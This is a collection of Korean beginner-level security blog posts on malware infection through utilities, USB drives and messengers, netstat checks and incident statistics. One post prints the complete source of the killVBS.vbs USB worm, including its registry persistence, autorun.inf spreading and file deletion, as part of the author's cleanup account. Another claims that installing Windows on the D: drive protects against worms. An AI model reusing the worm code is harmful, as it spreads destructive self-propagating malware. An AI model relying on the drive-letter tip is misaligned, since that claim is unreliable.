자신의 PC에 보안을 철저하게 하는 사람도 어느순간 악성코드에 감염이 되어 있는 경우가 있습니다. 악의적인 악성코드의 경우 자신도 모르게 포털이나 웹에 접속하는 비밀번호를 키로그하여 빼 나가는 경우가 많이 있겠지요  쓸데 없는 인터넷 방문도 하지 않는데 왜 악성코드에 감염이 될까요?  신뢰된 컴퓨터 사용을 하는 사람도 한순간에 감염이 되는 것은 바로 '유틸리티' 다운로드시 때문입니다.





1. 신뢰성을 유지한 자신의 PC 


늘 보안에 신경을 쓰면서 청정한 상태를 유지한다고 생각하는 A씨., 백신은 몇개 정도 설치되어 있고 무분별한 인터넷도 잘 하지 않는다. 그렇다고 게임을 좋아하는 것도 아니라서 게임은 아예 잘 하지도 않는다. 다만 사진이나 스마트폰 동영상 편집의 도구로 잘 활용하고 있다. 


오늘도 다른 때와 마찬가지로 밖에 나들이를 나가서 아이들에 대한 모습을 사진이나 동영상을 스마트폰으로 잘 찍었다.



2. 유틸리티 다운로드


사진이나 동영상을 잘 활용하여 멋지게 편집하여 지인이나 친척들에게 보여주려는 A씨는 B 프로그램이 좋다라는 것을 검색하고 B 프로그램을 찾기 시작한다. 비싼 상용 정품도 있었지만 프리웨어 또는 무료로 제공하는 유틸리티도 제법 괜찮다는 평이 있어 B 프로그램을 설치하기로 하였다.


그런데 막상 검색을 하다보니 프로그램 이름을 알고 있으나 막상 웹사이트 찾기가 만만치 않다. 검색해도 프로그램이 먼저 나온다. 어쩌다 사이트를 찾아 가보면 여러가지 회원가입에 정보를 넣으라는 절차가 번거로워서 카페나 블로그에 있는 검색된 유틸리티를 설치한다.



3. 속지말자. 출처가 불분명한 유틸리티는 악성코드 감염의 주범


특히 유명한 유틸일수록 검색하면 각종 블로그등에 많이 노출이 되어 있다. 클릭 한번으로 다운로드 받을 수 있으니 얼마나 편리한가? 그리고 아무 생각없이 열심히 설치하기 시작한다. 표면적으로는 아무런 증상이 안보이지만 일부는 악성코드를 포함하여 배포하는 경우가 많다. 


그러니 항상 원래 배포하는 웹사이트에서 다운로드 받는 습관을 가져야 한다. 심지어는 신뢰된 사이트에 유틸도 해킹을 하여 악성코드를 포함하여 배포하는 경우도 있어 주의가 당부된다. 그래서 대부분 신뢰된 웹사이트에 보면 무결성 검사를 위하여 해쉬값을 올려 놓은 경우가 많다.


다운로드 받은 해쉬값이라 원래 웹사이트에 있는 해쉬값을 비교하는 것이다. 패턴이 하나라도 틀리면 해쉬값은 변하기 떄문에 무결성 검사로 자주 이용된다. 



결론


모두가 그렇다는 것은 아니다. 하지만 대부분 무분별하게 블로그등에 유명한 유틸리티를 업로드 해 놓고 다운 할수 있도록 되어 있다면 유틸리티를 만든 웹사이트에서 내려 받는 것이 조금이나마 악성코드에 감염되는 것을 줄이는 방법중에 하나이다.  보안이 별것 없다. 다층적 구조로 겹겹히 보안하는 것이 강력한 보안인것이다. 아무리 잘 사용하더라도 한순간 다운로드 받은 공짜 유틸리티에 당신의 비밀번호가 빠져 나갈수 있다는 사실을 인지하길 바란다. @엔시스.






신고
Posted by 엔시스

최근 주말을 통하여 주요 사이트를 통하여 악성코드가 많이 배포 되고 있습니다. 사용자 주의가 당부되고 있습니다.

현재 유명 포털 사이트 메인에 링크되어 있는 글 링크를 클릭하였을때 해당 콘텐츠 링크되는 웹페이지에서 악성코드 발견되고 있습니다.

 

각종 무료백신에서도 탐지를 하고 있습니다.

 

특정 브라우져에서도 관련 내용에 대한 경고를 보여 주고 있습니다. 주말이라 방심한 틈을 타서 악성코드를 무자비하게 배포 하고 있습니다..


[대응방안] 

1. 백신업데이트

기본적인 것이지만 사용자 주의를 당부 드리고 혹시 최근 백신으로 업데이트 안되어 있는 사람들은 업데이트를 하고 최소한 백신 한두개 정도 설치 해 놓고 반드시 정밀 검사등을 해 보시길 권해 드립니다.

2. 각종 윈도우 및 응용프로그램 패치

감염이 되는 이유는 결함이나 취약점이 있기 때문입니다. 건강하면 감기나 바이러스 감염에 안되듯이 여러분의 pc도 잘 관리하여 운영체제 패치나 응용프로그램 패치등을 통하여 취약점 을 없애 주어야 합니다.

아주 간단한 방법이라도 실천하지 않으면, 보안에서는 아무소용이 없기에 꼭 실천해야 합니다. 아무리 보안에 잘 안다고 하더라도 실천이 없다가 포털 메인에 뜬 기사를 클릭하였을때 자신에게 취약점이 있으면 악성코드에 자신도 모르게 감염이 되는 것이죠. 그것은 그 사람이 보안을 잘 몰라서가 아닌 실천을 안해서 입니다.    -엔시스.


신고
Posted by 엔시스

보통 중요한 문서는 USB에 저장하여 이동하기 편하게 관리를 많이 하고 있습니다. 그럴경우 자신의 PC에서만 사용하면 괜찮은데 바이러스나 악성코드가 감염이 되었을때 꽂았다가 다시 자신의 PC로 가져 왔을때가 문제입니다.

[##_'1C|cfile25.uf@180614234C881A90259F3D.jpg|width="562"_##] USB 자동실행후 바이러스 감염 체크 여부'>

보통 이런 경우 바이러스 백신 최신 프로그램으로 [실시간 감시] 체크를 해 놓지 않는다면 또 다시 자신의 PC가 취약점이 있다면 악성코드나 바이러스에 감염이 되겠지요.

실제 위에 사례는 제가 가지고 있던 usb 이동형 저장 장치에 파일을 넣어서 외부 PC에 몇번 노출 시킨 적이 있었습니다. 그런데 어느날 갑자기 사용하려고 하니 바이러스에 감염이 되어 있는 것입니다.

자신의 PC를 잘 관리 하는 것은 다른 사람들에게도 피해를 주지 않는다는 관점으로 접근을 해야 하겠습니다. 그런 마인드가 없다면 언제 어떻게 또 다른 위협으로 다가 올지 모릅니다. 따라서 USB 사용하시는 분들은 반드시 백신 점검은 필수로 해 보시길 권해 드립니다.

특히 다음과 같은 시설에서는 USB보다는 사용할 파일을 담당자에게 메일로 직접 보내서 PC에서 사용할 수있도록 하는 것이 바람직 하겠습니다.

  • 공용PC - 프리젠테이션용이나 관리자가 없이 돌아가면서 사용하는 PC
  • PC방 - PC방에서 가급적 USB나 로그인은 하지 않는게 좋겠습니다. 요즘은 스마트폰으로 처리 될듯

백신은 늘 최신 엔진으로 업데이트 시켜놓고 특정시간에 자동 점검 할수 있도록 하여 수시로 점검 하는 보안에 생활화 하는 마인드가 필요합니다.



신고
Posted by 엔시스

2009년 해킹. 바이러스 현황 및 대응보고서를 검색 하게 되었네요.. 이러한 보고서와 통계자료는 좀 자주 오픈이 되었으면 합니다.


제 1 장 개 요
제 2 장 2009년 침해사고 동향 및 전망
제 3 장 침해사고 예방 및 대응 활동
제 4 장 국내·외 침해사고 대응협력 체계 구축
제 5 장 침해사고 대응역량 강화
제 6 장 결 론
참고 사이트





작년 12월에 작성 된 것인데 2010년 6월에 오픈 하는 것은 조금 시기적으로 늦은 감이 없지 않네요. 아무튼 잘 보겠습니다.

그런데 얼마나 많은 사람들이 관심을 가지고 볼지 그게 의문입니다. 보고서 작성한 연구원분들을 보더라도 유용하고 잘 활용하는 것이 우리의 자세일 것입니다..^^;;

그리고 좋은 곳에 잘 활용하면 고맙다는 메일 한통 정도 보내주는 센스^^ 가 있으면 좋겠지요..



신고
Posted by 엔시스

 

최근 118송이라 해서  해킹,바이러스,침해사고 등을 신고 할수 있는 전화번호가 바로 국번 없이 118입니다. 이러한 캠페인을 알리고자 KISA에서 118 Song 노래로 만들었는데 한번 들어보시죠 ^^

보통 캠페인송 하면 아이들, 동요 비슷한 음율을 가질수 있는데 118송은 최근 젊은이들의 취향에 맞춘게 아닌지 생각이 듭니다. 그런면에서는 제 한테는 잘 안 어울리지만 젊은 세대들은 좋아 하겠군요..

노래는 각인효과가 큽니다.^^ 캠페인 송이 많이 불려져서 보안에 대한 인식도 팍팍 늘어 났으면 하는 바램입니다. 대신 118에 근무하시는 상담원들이 조금 힘드시겠네요..

하지만 사명감으로 일해야겠지요..한번씩 클릭하여 들어 보세요..






신고
Posted by 엔시스



최근 PC를 사용하다보면 자신도 모르게 이상현상을 일으키는 일이 있습니다. 그것은 수 많은 웹사이트 방문으로 자신도 모르게 악성코드가 PC에 설치되어 있는 경우가 많습니다.

따라서, 정기적인 점검이 필요하며 그런한 현상을 drive-by-download 라 지칭을 합니다. 아마도 제일 많이 감염되는 것이 바로 동영상을 클릭하여 볼때 설치되는 엑티브엑스 같은 것이 아닐까 생각해 봅니다.

아래 동영상 한번 참고 해 보시기 바랍니다.  영어의 압박은 늘 자신을 탓하게 되는군요..눈치껏 알아 들으세요 T.T  영어 잘하시는 분들 있으면 밑에 간략한 써머리 정도 해 주셔도 좋을 듯한데...대충 감만 잡아도 성공..



 




신고
Posted by 엔시스

며칠전 부산블로거모임에 참여를 했다가 아직도 보안에 대하여 모르고 계신 분들이 많으셔서 어려운 보안보다는 쉬우면서 재미있는 보안으로 또는 한번씩 따라해 볼수 있는 초보자 보안에 대하여 살펴 보도록 하겠습니다..대체적인 의견이 보안에 대한 포스팅은 너무 어렵다는 것이었습니다.


우선 가장 관심이 많은 부분들이 자신의 PC가 안전한지 살펴 보는 것이겠죠..지금 이 내용은 가장 초보적인 눈높이고 하는 것이니만큼 이미 아시는 분들은 그냥 참고만 하시면 되겠습니다..제가 이런 것들을 기획한 것에 대해서는 추후 한번 정리하여 느낌을 적어 보겠습니다.


1. 우선 내 PC의 상태를 점검해 보자

가장 중요한 부분으로 자신의 PC의 현재 상태를 살펴 보는 것이겠죠..그러기 위해서는 각종 백신으로 한번 점검을 해 보아야겠습니다..인터넷 상에서 무료로 제공해 주는 백신이 많이 있으니 하나를 선택하여 설치해 봅니다..

많은 종류의 백신들이 있지만 대표적으로 V3나 알약 같은 것을 설치하여 점검을 해 봅니다..아무리 초보적인 부분이라고 해도 방향을 잡는 부분만 언급 할 것이니 굳이 설치하는 것까지 일일이 언급하지 않겠습니다..

그럼 점검 결과에 따라 내 PC상태를 알수 있겠죠...바이러스가 걸렸는지 ...아닌지...


2. 직접 상태 점검 해 보는 방법


1) 메뉴에서 실행명령을 타이핑 합니다..


                                [그림-1] cmd 명령어 실행

2) 명령어 창에서 netstat -an 이라고 타이핑 합니다..


                                                           [그림-2]  netstat -an 명령어 실행

위 내용을 보시면 실제  프로토콜이 보이고  자신의 PC IP와 포트가 좌측에 보이고  외부에 접속하는 외부 어드레스가 보입니다.
그리고 제일 우측에 보이시는 상태값이 보입니다..

  • LISTENING - 이것은 언제든지 포트가 열러있어 받아 들일 준비가 되어 있다는 이야기입니다.  로컬어드레스나 외부어드레스가 리슨하고 있다는 내용입니다. 언제든지 접속 할수 있다는 내용이지요..
  • ESTABLISHED - 실제 자신의 PC와 외부 디바이스와 컨넥션이 일어났다는 이야기이다..그것은 외부 아이피 어드레스를 보면 알수가 있습니다.



>netstat 명령어

  • Proto : 현재 netstat -an 명령어 실행시에 나타나는 열린 포트에 프로토콜을 말해 주는 것으로서 보통 TCP/UDP를 나타내어 준다.
  • Local Address : 현재 자신의 PC에서 나타나는 IP정보와 포트번호를 보여 줍니다.
  • Foreign Address : 외부에서 나에 PC에 연결되어 있는 IP정보와 포트정보를 보여 줍니다.
  • State : 상태값으로서 현재 LISTENING 는 서비스 준비가 되어 있다는 뜻입니다.
  •                                     ESTABLISHED는 실제 서비스가 연결이 되어 있다는 뜻입니다.
  • PID : 여기서 말하는 PID는 프로세스 ID로서 PID값을 알면 어떤 프로세스가 어떤 프로그램에 연결이 되었는지 알수가 있습니다. 따라서 실제 자신의 PC에서 해(害)가 되는 프로세스라고 하면 이 PID값을 찾아 제거하면 되겠습니다.



그래서 이러한 가장 간단한 명령어로 의심가는 포트가 열려있는지를 확인해 보는 것입니다..가장 쉬우면서도 자신의 PC에 어떤 포트가 열려 있는지 알수 있습니다..



                                                       [그림-3] netstat -ano 명령어 실행시     


로컬은 내 PC에서 열린 아이피와 포트를 알려주고 있으며, 포린어드레스에는 브라우져로 접속한 외부 서버IP나 기타 내 PC와 접속한 IP를 보여주고 있습니다. 그리고 상태값은 [리스닝]과 [Establish] 등 형태로 있으며, 보통 [establish] 같은 경우에는 내pc와 실제 컨넥션을 맺고 있는 상태이므로 집중적으로 그 프로그램과 프로세스, ip 등을 집중적으로 연구해 볼 필요가 있겠습니다. 물론 내 pc에서 정당하게 사용하고 있다면 제외입니다.


자신의 PC에서 어떠한 프로세스와 포트가 열려있는지를 먼저 파악하는 것이 우선이며 이러한 부분은 다음 강좌를 통하여 하나씩 풀어갈 예정입니다. 하나씩 하나씩 윈도우와 리눅스등에서 그냥 간편하게 할수 있는 보안에 대하여 풀어보겠습니다.


이렇게 한가지씩 가장 간단한 것부터 순차적으로 초보분들이 보안에 관심을 가져 볼수 있도록 콘텐츠를 꾸며볼 생각입니다.


맺음말

무료로 제공해주는 여러가지 악성코드 바이러스 웜제거 프로그램도 있지만 이렇게 자신의 PC에서 간단한 명령어 하나로 인하여 자신의 PC의 헬스체크를 할 수있습니다. 그것은 현재 나의 PC에 어떤 어플리케이션이 어떤 PID와 어떤 포트를 사용하여 외부에 연결이 되었는지를 알수 있는 것입니다.

간단한 방법이면서도 매우 중요한 방법이라 생각이 듭니다. 물론 응용어플리케이션을 사용하는 것이 더 쉽고 간편하겠지만 그렇지 못할 경우 바로 알아 볼수 있는 방법입니다. 참고 하시면 좋겠습니다.

 

신고
Posted by 엔시스

인터넷 사용하시는 분들의 대부분은 메신져를 사용합니다...대표적인 메신져가 MSNNATE겠죠...

이제는 이런 메신져는 메세지를 보내는 기능뿐만 아니라 여러가지 파일을 주고 받고 음성으로 이야기 하는 기능까지 다양한 기능이 있습니다...

이런 편리한 기능중에 파일을 주고 받을때 바이러스 감염 파일이 메신져로 주고 받으면 상당히 위험 하기때문에  다음 동영상을 보시고 적절한 대처를 하시기 바랍니다...





신고
Posted by 엔시스

인터넷에서 부분별한 다운로드로 인하여 바이러에 감염 될수 있습니다...아래 동영상을 보시고 안전하게 다운로드 받으시기 바랍니다..












신고
Posted by 엔시스

바이러스 백신은 혹시 있을지 모를 우리의 PC의 내부에 있는 의심 스러운 파일들을 제거 시켜 줍니다...동영상을 잘 보시고 따라 하시면 되겠습니다...




2008/01/27 - [보안관련 동영상] - 윈도우 보안패치 자동 업데이트 설정하기

신고
Posted by 엔시스
개요

이제 2007년도 얼마 남지 않은 가운데 2007년 10달 해킹, 바이러스에 대한 분석을 해 보고자 한다.  이는 시큐어넷에 나타난 통계를 바탕으로 하여 분석 해 본다.

2007년 해킹 바이러스 신고 접수 현황

사용자 삽입 이미지

우선 10월달까지 해킹, 바이러스 접수 현황을 보면 약간 주춤하기는 했으나 늘 비슷한 접수현황을 볼수 있다. 아직까지 꾸준한 해킹과 바이러스가 일어 나고 있다는 사실이다. 아마도 이 통계는 실제 접수된 통계를 나타내는 것일 것이고, 신고를 하지 않은 수까지 한다면 이보다 훨씬 더 많은 수치라고 생각한다.

웜,바이러스 접수 보다 해킹에 관련 된 접수가 더 많음을 알수 있다..아마도 이건 해킹이라고 하면 내가 피해를 입었다고 생각해서 접수 한 것 같고 , 우리가 흔히 접할수 있는 웜이나 바이러스 같은 형태는 침해 되었다고 보지 않는데서 신고를 하지 않아 접수률이 많이 적은 것 같다는 생각이 든다.


2007년 10월 신고 유형별 분석

사용자 삽입 이미지
신고 유형별 처리현황을 보게 되면 스팸릴레이로 도용되는 경우가 43%로 가장 높고 그다음이 단순 침입시도 하는 것이 27%로 2위에 조사 되고 있다. 눈에 띄는 것은 피싱 경유지로 사용되는 것이 78건이나 되고 홈페이지 변조는 116건이나 된다는 것이다...위에서 언급 했다시피 이것은 신고를 한 것만 가지고 통계를 낸 것으로 신고를 하지 않은 것까지 한다면 훨씬 더 많은 웹싸이트들이 해킹, 바이러스 ,웜 등에 노출이 되었을 것이다.


언론사 웹싸이트 보안 문제 심각

어제 주말에 여러가지 자료를 수집하다가 언론사 웹싸이트에 접속한 적이 있다가 감짝 놀랐다.  모 언론사 인터넷 싸이트가 트로이목마에 감염이 되어 모 백신 솔루션에 감지가 되었다. 그것은 여러가지 뉴스를 다루는 언론사 싸이트이기 때문에 사용자가 무방비로 노출된 상태에서 접속시에는 더 많은 감염이 이루어져서 결국 해당 언론사 싸이트는 트로이목마를 배포하였다는 이미지를 벗지 못한다. 하지만 더 위험한 것은 해당 웹싸이트에서 알지도 못하고 조치를 취할려고 하지도 않는다는 것이다..

관련 포스팅
[긴급] 헤럴드 경제 트로이 목마 감염 -조심하세요
대선기간, 트로이목마... 언론사이트를 노린다


마무리

위 통계에서도 볼수 있듯이 아직도 우리나라 웹싸이트는 공공연하게 해킹,바이러스의 위협에 노출되어 있다. 단지 그것이 외부로 드러나지 않을 뿐이다...자칫 대선이라고 해서 관심이 그쪽으로 쏠릴때 이곳저곳에서 여러가지 위협이 발생하면 안될 것이다. 

특히 인터넷 인프라가 잘 갖추어진 우리나라 현실이고 보면 조금만 방심해도 큰 재산을 당할수 있다., 지난 1.25 대란이 결코 다시 오지 말라는 법이 없다. 본인은 직접 1.25 대란을 현장에서 겪은 사람으로 누구보다 긴장감을 늦출수 없다. 혹시 이 포스팅을 보시는 분은 보안마인드를 함양하여 언제 어디서나 조심하면서 자신의 개정정보보호에도 각별히 신경쓰기 바란다. 위 통계치가 "0"이 될때까지 아마도 지속적으로 포스팅을 써야 할것 같다.@엔시스

신고
Posted by 엔시스
사용자 삽입 이미지

출처:중앙일보 기사중에서


오늘자 중앙일보에 따르면 메신져로 [내 여동생 사진] 이란 이름으로 메신져를 통하여 바이러스 감염을 시킨다고 하였다.

주로 첨부 파일은 영문으로 파일명이 되어 있으며 호기심을 자극시켜 클릭을 유도하여 실행 시켰을때 바이러스에 감염이 된다.


그리고 자신도 모르게 다른 메신져로 감염시켜 버린다는 것이다 .

이제 메신져는 인터넷 사용자라면 없어서는 안되는 수단으로 자리 잡았다.  호기심을 자극하여 유도하는 메신져에 조심 하기 바랍니다...
신고
Posted by 엔시스

브라우져 말썽이 새로운 것을 알아내다.

오늘 우연히 PC 작업을 하다가 새로운 사실을 발견 하였습니다.  그건 아주 간단하면서 흥미로운 것이었습니다.

며칠전서부터 자꾸 브라우져가 멈추는 현상이 계속더니 끝내는 이젠 자주 다운이 되는 것이었습니다..원인을 아무리 찾으려 해도 찾을수 없어 결국 운영체제를 다시 설치하게 되었습니다.

그래서 기존에 나누어졌던 하드디스크 드라이버 중에서 백업이 된 하드디스크는 나두고 기존운영체제가 깔린 곳을 포멧을 하고 다시 설치하였습니다.

우리가 항상 운영체제를 설치하다 보면 파티션을 나누는 부분이 있습니다..그런데 이곳에 아무런 생각없이 기존 파티션을 지우고 새로 생성을 시키고  그렇게 하여 엔터키를 치면서 설치를 하였습니다.


뒤바뀐 하드디스크 드라이브 명

문제는 모두 설치 하고 나서 다음과 같은 화면을 볼수 있었습니다...


사용자 삽입 이미지
그림을 보면 알겠지만  하드디스크를 나누는데 드라이브 문자열이 바뀐 것을 알수 있다.

그러니까  C가 D가 되고 D가 C가 된 것입니다.,.지금은 D드라이브에 윈도우 운영체제가 깔려 있는 것입니다,.

앞으로 여러가지 응용프로그램은 D에 깔리는 것입니다.

처음에 이런 현상을 보고 왠지 자꾸 헷갈리는 것 같아 다시 설치하려고 했습니다...왜냐하면 자꾸 D드라이브에서 데이터를 찾을려고 하기 때문입니다...습관이란 건 정말 무섭습니다..


웜이나 바이러스 공격이나 자동화 되는 공격의 노출에 방어

그런데 곰곰히 생각해 보았습니다..  웜이나 바이러스 , 스파이웨어 같은 프로그램들은 스크립트로 짜여진 경우가 많습니다.

그리고 자동적으로 우리가 흔히 많이 쓰는 디렉토리 경로에서 파일을 변조 하거나 숨겨서 실행 하기도 합니다.  보통 "C\windows\system32 " 라는 디렉토리를 많이 이용을 합니다.

시스템 파일이 많이 모여 있기 때문입니다..그런데  설령 웜이나 바이러스에 감염이 된다고 하더라도 위의 논리로 따지자면 드라이브명이 바뀌었기 때문에 C에서 찾을 수가 없지요..


윈도우 운영체제 파일은 꼭 C드라이브에만 설치 해야 하는가?

그런 생각에 다다르다 보니까  재설치를 하기 보다 오히려 보안 적인 측면에서 더욱 강화를 시킬수 있겠다는 생각을 했습니다.  재설치 안해도 되고 보안적으로 강화되고....

그 이후에 응용프로그램을 여러개 더 설치 하였는데 D드라이브에 아무런 에러 없이 잘 설치가 되었습니다.. 꼭 운영체제나 응용 프로그램을 C드라이브에 설치 안해도 된다는 것입니다. 그건 위에서 말한 자동화 된 웜이나 바이러스 , 스파이웨어로 부터 안전하다는 것입니다.

당연히 있어야 할 C\windows\system32 파일에 있어야 할 파일들이 드라이브명 변경으로 없으니까요..


마치는 글

남들이 보면 아무것도 아닐수도 있습니다..하지만 보안을 연구하는 사람으로서는 늘 여러가지 아이디어에 집중을 합니다..그 가운데 신문 기사에도 DDOS 공격이 나올때면 속수 무책인 실정을 보면 분명 무슨 대책이 있어야 할 것이라고 늘 생각했습니다.

아주 사소한 것이지만 고정관념을 벗어나 버리게 되면 여러가지로 창의적인 아이디어를 창출해 낼수 있다는 교훈을 얻을 것입니다..원래 알고 보면 별거 아닌거 , 남이 이미 하고 난 거면 별거 아닌거라고 생각하지만 창의성은 이런 곳에서 출발한다고 생각합니다. 이제 우리는 윈도우 설치시에 운영체제를 꼭 C에 설치 하지 말고 C드라이브가 아닌 다른 곳에 설치 함으로 인하여  조금 더 보안성 강화에 힘쓸수 있다고 생각합니다..^^  그런데 드라이브가 바뀌니까 헷갈리긴 햇갈립니다.,.금방 익숙해 지겠지요..^^



신고
Posted by 엔시스

요즘 이동디스크를 많이 이용합니다..하지만 안전하게 이용하지 않을 경우 자신도 모르게 PC가 감염되는 것을 볼수 있습니다,..며칠전 이동디스크로 자료를 타 PC에서 옮긴 적이 있습니다.  처음엔 아무런 생각없이 작업을 했었습니다.  일반 사용자들도 유용하게 사용하는 USB인 만큼 실제 경험 사례를 포스팅 해 보겠습니다.


 PC에 꽂고 자료를 보려고 하던중 이상한 메세지와 함께 경고 문구가 올라 옵니다..순간 바이러스나 웜에 감염된 것을 알수 있었습니다..

" 갑작스러운 경고 문구에 이게 무슨일이래? "   

하면서  다행히 백신이 있었기에 검사를 해 보았습니다.

사용자 삽입 이미지
                                               <그림-1 > usb 바이러스 감염 초기화면

그런데

"주소가 잘못 되었다고 나옵니다.."  "난 아무짓도 안했는데...."



주로 감염이 되면 자신도 모르게 브라우져 메인 화면이 위 그림과 같이 변하면 바이러스에 감염이 되었다고
생각하시면 됩니다..


사용자 삽입 이미지

                                       <그림 -2> 백신으로 검색하였을때 감염 발견

그리고 나서 백신으로 검사를 해 보았습니다...아주 바이러스가 바로 걸리더군요...우쒸...무슨 짓을 할지 모르니

사용자 삽입 이미지


                                       <그림-3> 감염 바이러스 세부 감염 조치내역


그리고 바이러스 정보 싸이트에서 어떤 영향을 미치는지 찾아 보니 네트워크 트래픽을 유발 한다고 합니다.
위 그림은 뒤에 버전이 544 인데 548로 보아 변종인 듯 싶습니다..


사용자 삽입 이미지

                                            <그림-4> 감염 스크립트 파일


그리고 이동 디스크에 폴더 보기-->숨김파일 체크를 해제하여 숨김파일 까지 보게 하여 보면 위 그림과 같은 파일이 있었습니다..


메모장을 가지고 그 내용을 보았습니다..


'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01          ***************
'**********************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
  set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
  WriteAll.Write AllFile
  WriteAll.close
  set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
  WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive

If Drives.DriveType=2 Then
   LookVBS "inf",Drives.Path & "\"
   LookVBS "INF",Drives.Path & "\"
End if 

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
  If Drives.Path<> "A:" Then
      Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
      Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
      Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
      Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
      LookVBS "vbs",WinDir & "\"
      LookVBS "vbs",Drives.Path  & "\"
    If Drives.DriveType = 1 Then
     If Drives.Path<>"A:" Then
     If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
       Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
       WriteAll.Write AllFile
       WriteAll.Close
       Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
       WriteAll.Attributes = -1
       End If
      
       If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
          Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
          Chg.Attributes = -8
          Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
          WriteAll.writeline "[autorun]"
          WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
          WriteAll.Close
          Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
          WriteAll.Attributes = -1
       else
          Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
          WriteAll.writeline "[autorun]"
          WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
          WriteAll.Close
          Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
          WriteAll.Attributes = -1
       End if
       End If
     End if
  End if 
  End If
  Next
  if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
 sub LookVBS(File2Find, SrchPath)
    Dim oFileSys, oFolder, oFile,Cut,Delete
    Set oFileSys = CreateObject("Scripting.FileSystemObject")
    Set oFolder = oFileSys.GetFolder(SrchPath)
    For Each oFile In oFolder.Files
    Cut=Right(oFile.Name,3)
    If UCase(Cut)=UCase(file2find) Then
      If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
     End If
    Next
 End sub

 

내용을 보니 대충 알것 같았습니다.. 그것은 wscript 시스템 파일을 killVBS 파일로 바꾸어 변조시키고 이 파일을 레지스트리 깊숙이 넣어서 재부팅을 해도 지속적으로 활동하게 만들었습니다..


사용자 삽입 이미지
                          
                                 <그림-5> usb 꽂으면 자동실행 파일


이동디스크 숨김파일을 전부 보면 이렇게 자동으로 실행하는 파일을 만들게 하였는데 wscript 파일이 killVBS파일로 동작하게끔 만들어 졌었습니다.

그리고 나서 백신으로 치료를 했는데 분명히 치료가 되었다고 하여도 또 그대로 입니다...무슨 문제일까요?

그래서 이동디스크를 파일을 백업을 받고 나서 빠른 포멧을 시켰습니다...그래도 동일합니다...그건 이동디스크가 점유하고 있는 디스크가 플러그인 되자 마자 클릭을 해 보면 열리지 않고 또 경고 문구가 나옵니다.

이동디스크 바이러스에 대한 가장 일반적인 형태입니다..그래서 이번에 아예 빠른 포멧이 아닌 정상적인 포멧을 하였습니다..그랬더니 이번에 아무 문제가 없었습니다.

이동디스크는 치료가 되었지만 PC에 있는 파일 제거가 문제였습니다...




사용자 삽입 이미지

그렇게 해서 살펴 보던중 비슷한 경험을 하여 적어 놓은 것을 검색하여 찾게 되었습니다..

관련 싸이트 :  killVBS.vbs 수동으로 제거 하기 

위 방법대로 하고 나니 가장 문제였던 window -->system32-->killVBS라는 스크립트 파일이 wscript 파일로 원래 파일로 돌아왔습니다..무슨 파일인지는 잘 모르겠으나 분명 윈도우 시스템 파일이었습니다.

그 사실은 감염되었을때 같은 아이콘이 killVBS라고 되었고 날짜도 오늘 날짜였습니다..하지만 수동으로 제거를 하고 나니 같은 아이콘인데 wscript 파일로 되어 있었으며 날짜도 2004년 날짜로 되어 있었습니다..

바이러스, 웜 , 아무리 조심해도 어쩔수 없나 봅니다..그래서 무엇보다 최신 백신을 설치하고 이동디스크는 플러그인 할때 꼭 백신 검사를 해 보시기 바랍니다...꼭이요.,..이거 찾고 하느라고 꽤 많은 시간을 허비 하였습니다.


흔히 usb 하면 이동디스크로 간편하게 잘 사용하고 있지만 지금 처럼 감염이 되면 네트워크에 부하을 일으키는 주범이 되기도 하고, 또는 중요한 파일을 넣어가지고 다닐때 분실하면 많은 자료 유출에 우려 사항도 있습니다.
따라서  usb를 사용하더라도 분실과 바이러스 감염에 대응 할수 있는 방안으로 폴더에 암호를 건다든지 보안 usb를 사용한다든지 하는 usb에 대한 보안마인드를 평소 가져야 겠습니다.


여러분들도 수고를 덜으시라고 포스팅 해 봅니다... 바이러스야 물러가라~~~~워이~~~




 

신고
Posted by 엔시스

최근 중국쪽에서 usb 관련한 바이러스가 유행한다고 한다.  그러다가 다음과 같은 현상을 보았습니다.

혹시 아시는 분 있으면 조언 부탁드립니다.


사용자 삽입 이미지

       avast 바이러스 체크 프로그램에서 그림과 같이 나타났다.

     
사용자 삽입 이미지

        그리고 shell64.dll 파일을 고칠건지 , 삭제 할건지 등등의 물음에 고친다고 하고
        클릭을 해 보았습니다.


      
사용자 삽입 이미지

